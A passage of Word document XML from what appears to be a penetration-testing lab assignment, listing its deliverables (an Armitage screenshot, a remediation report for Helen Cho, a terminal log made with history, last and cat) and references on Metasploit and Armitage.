        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Screenshot of the Armitage host map with the victim and a matched attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• A brief report: the vulnerability exploited, the impact demonstrated, and the remediation — written for Helen Cho.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Terminal Activity Log: on the attacker container, run  history 10 &gt; lab09.txt , then last -n 10 &gt;&gt; lab09.txt , then  cat lab09.txt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Metasploit Unleashed (Offensive Security, official free course)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Metasploit Framework Documentation (Rapid7)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Metasploit — WMAP Web Scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Armitage — Manual (official)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• [Video] Metasploit for Beginners</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